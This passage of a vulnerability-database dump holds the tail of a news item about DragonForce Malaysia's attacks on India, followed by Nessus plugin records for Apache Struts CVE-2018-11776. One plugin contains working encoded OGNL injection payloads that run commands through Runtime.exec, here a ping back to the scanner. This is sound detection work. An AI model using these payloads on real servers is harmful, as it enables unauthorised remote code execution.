OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-10-05T14:41:15", "description": "The version of Apache Struts running on the remote host is 2.3.x prior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a possible remote code execution vulnerability when results are used without setting a namespace along with an upper action that does not have a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-08-22T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17.NASL", "href": "https://www.tenable.com/plugins/nessus/112036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112036);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x\nprior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a\npossible remote code execution vulnerability when results are used\nwithout setting a namespace along with an upper action that does not\nhave a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3\", \"max_version\" : \"2.3.34\", \"fixed_version\" : \"2.3.35\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.16\", \"fixed_version\" : \"2.5.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:40:20", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the handling of results with no namespace set. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/112064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112064);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/17\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the handling of results with\nno namespace set. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to potentially execute arbitrary\ncode, subject to the privileges of the web server user.\");\n # https://www.tenable.com/blog/new-apache-struts-vulnerability-could-allow-for-remote-code-execution\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a21304a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 / 2.5.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach var cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping%20-c%203%20-p%20\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\npayload_redirect = \"%24%7B%7B57550614+16044095%7D%7D/\";\npayload_redirect_verify_regex = \"Location: .*\\[73594709\\]\";\n\npayload_2_2 = \"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/\";\n\npayload_2_3 = \"%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29%29%7D/\";\n\nfunction namespace_inject(url, payload)\n{\n local_var bits, last, attack_url;\n\n # find the last / and put it after\n bits = split(url, sep:\"/\", keep:TRUE);\n last = max_index(bits) - 1;\n for (var i=0;i<last;i++)\n attack_url = attack_url + bits[i];\n attack_url = attack_url + payload;\n attack_url = attack_url + bits[last];\n\n return attack_url;\n}\n\nforeach var url (urls)\n{\n # first we try the 2.3.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_3);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n var snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # next we try the 2.2.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_2);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # and finally, we try a simple redirect namespace injection\n attack_url = namespace_inject(url:url, payload:payload_redirect);\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n report =\n '\\nNessus confirmed this issue by injecting a simple OGNL addition payload'+\n '\\n( ${{57550614+16044095}} ) into a redirect action namespace. Below is' +\n '\\nthe response :'+\n '\\n\\n' + snip +\n '\\n' + res[1] +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:41:58", "description": "According to its self-reported version, the Cisco Unified Communications Manager (CUCM) running on the remote device is affected by a remote code execution vulnerability. Please see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "href": "https://www.tenable.com/plugins/nessus/112289", "sourceData": "#TRUSTED 5538e58acd3b9c3603d69886501b4d03206d911e89a8d42c5b4e7eca707c4d625bc7498ef348a9ccbcb5336c36a12a8c522e9b7208a928417ca393d93d9b75b3674b5020a3adf4e9ded633106ddd86864d79657cbdb95644342b2f275592d8f9e6fc1f66ff78f01c1325c212b34be69ad9e19e9079abea97ba850b3de2a5b4c17ea6bcb025e35351d747f7a3bfd9a692abe32cfb1acd6df9a1ed4437cef173f52741ba940ea420a6a307c28113c77d3911f694bbd8b4770b2e393e952b7721160a3ace2b9a105b946878666ddb6b6277e8dd37cc0b540d3cab9ba05675333685d3567dc787a898345d49807afa2c4e8dadc80157671c59645ec28d4d731254f700afcdde8541b7fc40f5bf22104a815dfb9ffec8005793c65a930bc671999876981b110d057967ac4aec3e59486c42d91bfdbacd15266c2227ee145c9c1f68b594923b7c279533429a89c5a243111afa033972ae83c9fc79e2601de851679ed9c299cb484ffd80c57ac3b34925bb3cba116fcda0316d36ecd2faa6315da0eb4e36614b14339a5b4a8bf1733e633b7f9f29f76f24eb6dbba11d66280d6e3e0195481f24ff5256f30dbac9ca2fbd0297cc6cc377e602403cf222d850e159cf5a4a46f673c55f9ece04e1b4703056a271d88239f32fd0101e729543bc9b902ffe81653218ce1f59a8de7edc84c8cd3a6afeafbbf24ba8b4385bcd815cde5a4733f9\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112289);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14042\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability. Please see the included\nCisco BID and the Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14042.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Communications Manager\");\n\nversion_list = make_list(\n '11.0.1.10000.10',\n '11.5.1.10000.6',\n '12.0.1.10000.10',\n '12.5.0.98000.981');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['display_version'],\n 'bug_id' , \"CSCvm14042\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:40:49", "description": "According to its self-reported version, the Cisco Identity Services Engine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-08-31T00:00:00", "type": "nessus", "title": "Cisco Identity Services Engine Struts2 Namespace Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/112219", "sourceData": "#TRUSTED 97aa159b84dc044b30c1959493ad4c2ef0b54f85d3e848f88bee9278a7ddad8a181a74909f1d0d76ce1b6789d6c52e06d8149ee1cd6b40ddc4809e01f93833be8020dacc4dd4a97c9adce91fde281659f57715154563c57a7067c369b7d014b2a20c63c0692370955493497ee5cc676ed67b7252f230321c84a756e4f7c6d300d603cb3a8441874a6b4a31d3e38b204cdfedfac2e159a1a6050a4e54e7e7d3a571f78bedb4ce38b25be27cfd186ec5a6d7ecb38bfcfc47307d6e8f2129c339cc2a40a9c1c376b220a07abb868589c8dd6bda1077121b2eaf32b235e36d05a0421ed24805286671b039794ad9999fff2a8ceea76e4cc2f7cf8611fd9b28ec473949aba55b3f4a0cfd91455716d0733c829031593c83528f5d8fbcb05351beaad63c70c1095d11b5d38e04cba7fd3800c21beb5e6382e20a3ccb6d00ac98d43d6ea3f1ff6566edeb9f0e8d98068cf9d6c881c0642ffda92b77e30b7b7ddf74136dca18b0813568c2f591018a81531bae509d7df421eef82e4d4fba2ffd1b76b3a561e1018e2630dac16d14f05b6342fb8c08ca13b94882eb818ba59f9f11fce385b9a3bf4dd7f0524b9d50096716733342ac10b83b1e52ba609ba841786810a1c88816deeb90ef81ff652cb02d46c1babdec6c8b9d00657c051ee857779d7fd75b624224079533e69b4308b4ee87d8a1cc79d022715df20de81e55f351e7a543e7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112219);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14030\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Identity Services Engine Struts2 Namespace Vulnerability\");\n script_summary(english:\"Checks the Cisco Identity Services Engine Software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Identity Services\nEngine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for\nmore information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n 